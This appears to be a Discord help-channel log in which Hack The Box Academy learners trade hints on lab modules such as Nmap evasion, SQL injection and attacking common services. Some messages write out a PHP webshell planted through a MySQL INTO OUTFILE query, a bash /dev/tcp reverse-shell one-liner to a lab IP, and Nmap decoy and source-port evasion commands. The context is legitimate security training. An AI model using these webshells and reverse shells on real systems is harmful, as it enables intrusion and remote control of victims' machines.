#

how long did it take i mean CBBH for you?

dim hound
#

Watch dogs really motivated me to hack more and more 😆

dim hound
supple patio
#

did you try some bugs?

#

ofc

sweet knoll
#

Hi Guys, can someone kindly help me to find the email of the marketing team of HackTheBox?

#

or any other ways I can get in touch in with them ?

naive wadi
#

Or I have the answer and just can't see it

acoustic owl
sweet knoll
acoustic owl
#

On the page below there is a form

dim hound
sweet knoll
#

yes saw that it's probably for people who are interested in CTF creation using HTB I'm looking for something else, but thank you

dim hound
#

Atm I already finished CPTS path.. so I am working on offshore 😆

sweet knoll
#

any kind of email will help tremendously

acoustic owl
#

Otherwise you can also open a support ticket (Green Bubble).

acoustic owl
autumn pilot
#

is there something that prevents you from filling out the form

sweet knoll
naive wadi
#

Can anyone else give me a nudge with the hard av evasion in the NMAP module?

iron plaza
#

you have odd number of quotes

fiery berry
#

try to add ";" before the new-line char. Of course remember to find a way to bypass the security filter in place. EDIT: I guess where the double quotes

sacred ermine
naive field
#

hey guys im doing attacking common services easy lab, i got onto ||mysql|| and I've heard i need to upload a webshell, but i have no idea how to, where to etc... been stuck on this since yesterday pls help

dim hound
#

Also in the modules, they will tell you how do to that exactly in MySQL

naive field
naive field
#

i tried SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'; and i get error no such file or dir

dim hound
#

well 😉 which type of OS is it hosted on

naive field
naive field
#

but when i go to /webshell.php or dashboard/webshell.php

#

its not working

#

://///

dim hound
#

You are close..

dim hound
rustic sage
#

can i have admin?

dim hound
#

@naive field Use the link as a nudge 😁

rustic sage
#

please

#

@surreal rain

slender steppe
#

you are right just put the cat on the right place

#

you are very closed

vital adder
#

@rustic sage keep spamming like that and you will get the 👢 from mods

naive field
#

i will rn

dim hound
#

Good ; )

naive field
# dim hound Good ; )

idk what im doing wrong xd im trying c:\xampp\htdocs\webshell.php then adding dashboard in between removing stuff 🤷‍♂️ i looked up root dir of xampp servers and tried with those paths but no

#

:/

dim hound
#

that should be correct

#

||c:\xampp\htdocs\dashboard\webshell.php||

naive field
#

GOT OT

#

IT

naive field
#

it need to be capital C

#

....

dim hound
#

bhahaah

#

Well done hehe!

naive field
#

so now i just add teh revshell script in the string above where i just wrote "c" for testing?

#

im jus asking since the shell would be long ig

#

oh wait maybe ftp big_think_onion

dim hound
#

||rce ||

naive field
#

ohhhh

#

thanks haha

dim hound
#

np

naive field
dim hound
#

You have the know the default web root location of xmapp .. when that doesn't work you have to figure out to which folder you can write😌

#

In mine option none of the CBBH/CPTS modules are ctfish, they are made for a good reason 😁

naive field
#

but ig they have similar module

#

yeah i feel like this rce is pretty realistic

#

but not sure what are the chances to actually get internal access to mysql to do this thinkpad

dim hound
naive field
#

about to do my first official web pentest for a company tommorrow

surreal rain
naive field
dim hound
naive field
#

this just killed my confidence but whatever ig haha

dim hound
#

hahaha 😂

fathom pendant
fathom pendant
obsidian crescent
#

Out of curiosity... what does the 8 hours represent?

naive field
fathom pendant
fathom pendant
naive field
dim hound
fathom pendant
#

As stated they are an average expectancy based on assumed knowledge of some of the more basic things that the module probably won't teach you

fathom pendant
dim hound
naive field
#

or were familiar with it

#

fs

fathom pendant
dim hound
#

I have CRTP & CRTE😅 but that was some years ago.. but yea I am pretty familiar with the AD concepts. Nevertheless, their AD section is really solid

fathom pendant
dim hound
dim hound
fathom pendant
#

As a fundamental

dim hound
fathom pendant
naive field
dim hound
naive field
#

im still not at AD, heard it takes a week or two to finish it

#

🤷‍♂️

naive field
#

sounds like its fun

#

haha

dim hound
#

If you are new to the concepts.. then yea maybe 😁

naive field
#

bruh i cant find this flag lol

#

the output syntax is awful

#

💀

fathom pendant
#

New line at each timestamp

naive field
#

got it 🙏

#

used a search cmd, would never find it manyally

#

manually

fathom pendant
#

Ctrl-f is based

naive field
#

i just used dir "\flag.txt" /s cmd

#

to find the flag on sys

rustic sage
#

so do i get admin?

obsidian crescent
#

Anyone got a good source for cred stuffing lists?

rustic sage
obsidian crescent
naive field
obsidian crescent
#

Just in general, maybe this isn't right forum for that. if so my bad.

#

The modules mention it, but didn't really ever provide any known lists other than default cred lists

naive field
#

option\

meager otter
#

I am doing the API module and I am super stuck on Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer.
This is using SQLi on the id parameter. Anytime I put anything in I get the >. Cant figure out what I am doing wrong. Would appreciate a nudge

fathom pendant
meager otter
naive wadi
#

Looking for a nudge on the hard NMAP AV/Evasion lab. Have tried multiple scan attempts; -sU, -sA, nb* & smb* scripts e.g.

  • nmap <ip> -p <port> -sU -sV --script nbstat.nse -Pn -n

  • `nmap <ip> -p <port> -sU -Pn --reason -D RND:4 --packet-trace --disable-arp-pi

    Have also been monitoring via TCPDUMP & connecting with NC

fathom pendant
#

Remember your goal is to do it quietly. Bombarding it with rnd and such will get you quickly banned out for a few minutes

fathom pendant
#

So it's expecting a closing quote

meager otter
#

Thank you

fathom pendant
#

Only thing I can reasonably think of for it to print the >. (Which is indicating it's trying to start/finish a line, similar to bash if you use a single quote it goes to next line )

naive wadi
fathom pendant
#

To use source-port you need to run nmap with sudo

#

It's nothing complex

naive wadi
#

I've been using source port, i thought you meant as in source IP. Think Im over complicating as usual.

#

Thanks

fathom pendant
#

Hint the syntax is similar to the example that uses -sS if you specify the --source-port

#

From there it is just going down the line

naive wadi
#

Okay thanks

opal hull
#

ls -la

raven saddle
#

Hello, I'm having a little trouble on the Dancing module. For some reason I can't connect to the SMB I think. It keep saying "tree connect failed: NT_STATUS_BAD_NETWORK_NAME" Any ideas as to what's going on?

autumn pilot
limber widget
#

On password attacks lab - hard: Im nearly complete, I found the backup.vhd, but the only way I found this was logged into xfreerdp as joanna, then cmd command "runas /user:david cmd" so I have a terminal as david and can see the file. But im getting frustrated not being able to simply download this backup.vhd to my kali VM. What am I doing wrong or missing?

autumn pilot
#

You need to find a way to download large files, before the service times out

trail leaf
#

On File Upload Attacks - Whitelist Filters, I've found something that returns the "File successfully uploaded" text, but when I go to check for the file in the directory that I've made sure is the right one, the file isn't showing up. Any nudges? I can DM as well.

limber widget
thorn urchin
#

so gotta skip those

naive field
#

hey guys, i need some directions for attacking common services medium lab

#

scanned nmap

#

tried bruteforcing what i could but nothing

#

i see there is domain port open, am i supposed to do dns spoofing or sm?

#

i mean that would lead to nowhere if u get me

#

so i rly dk rn

tribal plume
#

If I have the basic php webshell on a page <?php system($_GET['cmd']); ?> shouldn't I be able to run a reverse shell by visiting http://website/shellpage?cmd=bash -i >&%20/dev/tcp/10.10.14.6/4321%200>&1 (i.e., shouldn't I be able to get a reverse shell out of that one-liner?"

limber widget
#

whats the easiest way to transfer a file from a xfreerdp session via powershell to attack kali vm

autumn pilot
#

try to specify the full path to bash, e.g. /bin/bash

#

You can mount a local folder and use it to transfer files

tribal plume
dim hound
#

Also use /dynamic-resolution 🙂

tribal plume
trail leaf
summer prism
#

I'm stucked since 4hours on this module, Active Sub-domain enumeration

Find and submit the contents of the TXT record as the answer.

zinc sentinel
limber widget
#

https://imgur.com/xiCvafg - so idk if im asking this right, idk why im so confused here. I just need this backup.vhd file moved to my kali box

autumn pilot
dim hound
limber widget
lament lance
#

Can someone please help me with Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.?
nmap module
I tried almost all script categories and aggressive scan and foujnd a webserver as the hint suggests but no flag

summer prism
dim hound
tribal plume
summer prism
summer prism
#

even ran the command for all of these

dim hound
#

In order to see the 'right' TXT record. You have to specify an ||internal|| zone 😉

summer prism
#

i did this before ;3

limber widget
dim hound
#

yes, but maybe you have to specify a different name sever 👀

#

||ns||

autumn pilot
zinc sentinel
summer prism
#

'''dig txt inlanefreight.htb ns.inlanefreight.htb'''

thorn urchin
#

or verify your account and you can post images

dim hound
#

You have to supply an other parameter in your command 😁

summer prism
#

maybe a hint? 😉

thorn urchin
#

dig --help

dim hound
#

Review the module again, then you will understand what you are missing ; )

#

if not, I will provide the answer after 1 hour or so

summer prism
#

the module is about using nslookup, however that command wont work

dim hound
# summer prism the module is about using nslookup, however that command wont work
#

Look at number; 8 of this article ; )

#

8. Use a Specific DNS server Using dig @dnsserver

summer prism
#

||dig TXT @ns1.inlanefreight.htb inlanefreight.htb dig: couldn't get address for 'ns1.inlanefreight.htb': not found||

#

same with ns

dim hound
#

the error is right at front of you

#

Understand what you are doing 😁 and why that command doesn't work

acoustic owl
summer prism
#

Aaah, finally

#

thankyou buddies :))

dim hound
#

Good job! That's the mentality, to try better and at the end you are able to solve it without to much help.

summer prism
#

This module is confusing, same part in footprinting module had me frustated

acoustic owl
limber widget
#

ugh I had to use smbclient as david, no wonder I was stuck in an impossible spot

lament lance
#

Hi! I'm trying to enumerate Firewall and IDS/IPS Evasion - Medium Lab, I'm using the command:

sudo nmap 10.129.113.199 -sA -sV -Pn -F --packet-trace --version-trace -n --disable-arp-ping -T 2 -D RND:5 --source-port 53

And the question is:
After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
Could someone point me in the right direction? I'm quite lost.

odd knot
#

I hope someone can help me I do the footprinting lab- medium. I logged in with rdp and find a the file with the password, and now I don’t know how to connect to the sql server. I read something about, that I have to start sql with admin permissions, but I can’t type “@“ in the admin password bar does anyone have the same problem? And if I want to connect the sql database it doesn’t let me with the administrator account.

naive field
#

2 pop3 ports

#

i've heard from someone i need 6 ports open

#

but i restarted the machine, did -p- in nmap

#

nothing

#

always same

#

🤷‍♂️

steady hawk
naive field
#

lol

#

shit i think i even did like 5

#

ig ill reset

#

till it pops up...

zinc sentinel
#

Reset and wait 5mins before scanning aswell

limber widget
#

Can anyone help me understand how this hash "31d6cfe0d16ae931b73c59d7e0c089c0" is an empty string for the HARD password attack lab? This should be the admin hash

naive field
#

i reseted 15 times lol

#

ill let it wait then

#

a few min

zinc sentinel
fringe shell
golden vortex
#

im doing Login Brute Forcing web skills assesment. Is their a username i should be using or do i need to make a username list?

naive field
rustic arrow
#

Module: Footprint > Oracle TNS
Is there a way to connect to TNS without sqlplus? It's painful to install it
Should odat be enough?

fathom pendant
#

Afaik no. Following the instructions in the section should be more than enough. They even tell you what to do if you run into a couple specific errors

onyx rapids
#

Has anyone finished Skills Assessment - Hard of the HTTP Misconfigurations Module? I'm stuck on a section and it's driving me crazy. Payload works, but don't understand why admin isn't hitting the page

latent patio
#

I have a bit of a strange issue. Has anyone come across a situation where a section isn't being marked as complete even though they have answered all the questions?

fathom pendant
#

You need to click "mark complete and next"

latent patio
#

I have done that, but weirdly enough it isn't actually marking it as complete in the list.

#

It is the Antak Webshell section in the Shells & Payloads module. I have finished everything in the module, but that one section is preventing it from registering the module as complete.

fathom pendant
#

Message support then

#

¯_(ツ)_/¯

latent patio
#

Fair enough, thanks for looking. Wasn't sure if there was something I was missing.

naive field
#

did any of yall get error Authentication failed with smbmap

#

even tho Null login is available on the server?

steady hawk
naive field
#

smbmap -H ip

steady hawk
#

Ah, ok, I was gonna suggest that lol, because i remember not being able to get a null session with -u "" -p ""

naive field
#

yeah idk :D

steady hawk
#

Try smbclient maybe, I've done some boxes where smbclient works and smbmap doesn't

naive field
#

yeah smbclient does, was just trynna do the enum automated

#

thanks

steady hawk
#

Yea, i much prefer smbmap

little bear
#

Hi Guys. Quick question: Just to confirm, is kirbi2john just a script to format krb5tgs-tickets? It sounds silly, though really helpful, but just spent the last ~40mins trying to debug a script that was already included in parrotOS. I'll be maining in python soon (Ik I spent way to long), but just wanted to gain a little more insight by those who have used it more than I. Thanks for the insight!

naive field
#

can someone help me with attacking common services lab

#

rq

#

im stuck at sm i think i should not be stuck

#

its a hard lab

#

i got onto ||rdp|| but can not connect to ||mssql|| for some reason

#

with the sam creds

#

same*

paper cargo
#

hello

#

im new to hackthebox

#

anyone can help?

#

please dm

naive field
#

chat in there brotha

paper cargo
#

ok

naive field
#

dm me i can help u whats up

paper cargo
#

okay

fathom pendant
fathom pendant
naive field
#

:D

fathom pendant
#

They're locked to academy, seasonal for some reason, and of course- seeing announcements

dim hound
#

Look for other creds 🙂

naive field
fathom pendant
#

That's what they just said

#

Lol

naive field
#

no, i've been told by another person i can

#

so i got confused for a sec :D

naive field
tough prawn
#

Hi Guys I have some Questions in SQLMAP ESSENTIALS Modules

Q/ How I know When to use Prefix/Suffix ?
Q/ How I know When to use UNION SQLi Tuning ?

naive field
#

still stuck on this

dim hound
naive field
#

ilyk if i do it before that so u dont bother checking :)

naive field
#

i just added the windows auth on mssql login lol

empty fog
naive field
#

ok just finished the lab

#

and i have no idea what i have done at the end in mssql

#

i understand 0 of the syntax l o l

#

okay now i do, thanks chatgpt

dim hound
naive field
#

thanks man

dim hound
#

Wel done!!!!

naive field
#

im not even halfway there, 39% of the path

#

ugh trust the process ig lol

#

should i do intro to AD module before AD enum and attacks?

acoustic owl
dim hound
naive field
#

ik basic concepts of forests etc etc

#

and what is AD

odd knot
fringe shell
slow girder
#

question 5

glad orbit
#

What is this user's cleartext passwordLocate a configuration file containing an MSSQL connection string.Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

faint rampart
faint rampart
faint rampart
summer lava
#

gonna need some help
Web Attacks - Skills Assessment

#

i did PE to the admin and got the vulnerable point

#

but tried almost every XXE but none of them prints out

mint linden
#

Hi All. Looking for some help on the Firewall and IDS/IPS Evasion - Hard Lab.
I have run the commands which are practically given to you in the Module.
Found the right port but when trying to run netcat to get the answer I am getting:
(UNKNOWN) [10.129.2.47] 50000 (?) : Cannot assign requested address
Any ideas?

vivid magnet
#

hiya guys, Anyone doing LDAP modules?

last stag
vivid magnet
#

@last stag - trying to enumerate an account via linux to see which user has SMARTCARD_REQUIREMENT

#

sadly not seeing any options for windapsearch or ladapsearch-ad

#

i know how to run commands on Windows to get this but from linux only i'm running into issues

summer lava
#

HI Guys, gonna need some help
Web Attacks - Skills Assessment
i did PE to the admin and got the vulnerable point
but tried almost every XXE but none of them prints out

vivid magnet
sick mural
#

Hi, Little help needed here, In the (Payloads & shells -> The Live Engagement) I am trying to upload a ruby script /php/webapps/50064.rb. But MSF is not picking it up. when i try to search by Facebook or by 50064 it shows me no results. Can someone guide how to make it loaded in MSF please.

#

Steps performed: 1. Changed the name of ruby script. 2. check the permission they are as the other scripts in same directory. 3. Restarted the msf. 4. ran updatedb on the system and then restarted MSF no luck.

mint linden
#

Hi All. Looking for some help on the Firewall and IDS/IPS Evasion - Hard Lab.
I have run the commands which are practically given to you in the Module.
Found the right port but when trying to run netcat to get the answer I am getting:
(UNKNOWN) [10.129.2.47] 50000 (?) : Cannot assign requested address
Any ideas?

#

but I have the correct command to run. nc -nv -p 53 <IP Address> <Found Port>

#

which is equiv to the ncat command in the module

tribal plume
mint linden
#

it's okay I installed ncat instead and it worked first time lol

vivid magnet
rustic sage
#

Hello, did you solve it? I'm stuck, the listener doesn't retrieve the shell

autumn pilot
#

well, particularly in that section of the module you don't need a reverse shell 🙂

#

take a look at the part in the section that talks about custom web shell(s)

rustic sage
#

I've tried it, but I can't find the location of flag.txt

autumn pilot
#

if I'm not mistaken the location of the flag file is mentioned in the question itself

tough prawn
#

Hello

#

Im stuck in SQLMAP ESSENTIALS -> Skills Assessment

#

I Don't Find any Parameter or post data

#

Just a static page So what I do ?

#

Almost I tried Every thing

faint rampart
#

without postgresql loaded, no amount of updatedb would find your added exploit, from experience.

night hawk
#

Hi, if someone from the administration hackthebox academy could contact me because I can not reach one of the domains in the module

fathom pendant
night hawk
#

Attacking Enterprise Networks

#

Module: Web Enumeration & Exploitation

#

Domain: gitlab.inlanefreight.local

fathom pendant
#

add it to your /etc/hosts

night hawk
#

I did that

fathom pendant
#

try everything from that section ¯_(ツ)_/¯

night hawk
#

The best part is that EyeWitness reach that page, but I cannot xD

vocal sentinel
#

Can anyone help me how can I create account on HTB Academy because mine isn’t working

#

?

fathom pendant
#

Contact support. Bubble in the bottom right

sick mural
fathom pendant
#

Ye I forget how silly that one is

sick mural
#

Just got that done few minutes back.

sick mural
tough prawn
autumn pilot
#

interact with the application, you will see something interesting

fathom pendant
tough prawn
autumn pilot
autumn pilot
keen compass
fathom pendant
#

What module name ?

keen compass
autumn pilot
#

use the provided username and password lists from the resources

fathom pendant
#

Ah. Try attacking a different service iirc there's another service running on that box

#

Ssh is super slow

keen compass
#

may I dm somebody or should I spoil here ?

fathom pendant
#

(yes I know the question asks ssh iirc)

keen compass
#

ok, I will ask here then, the Openssh is 7.7 so it seems to be vulnerable to user enumeration but, trying multiple exploits, any users of the list are found as being valid.
May I enumerate users from the previously compromised WinRM session or should I try other path without reusing my initial WinRM access ?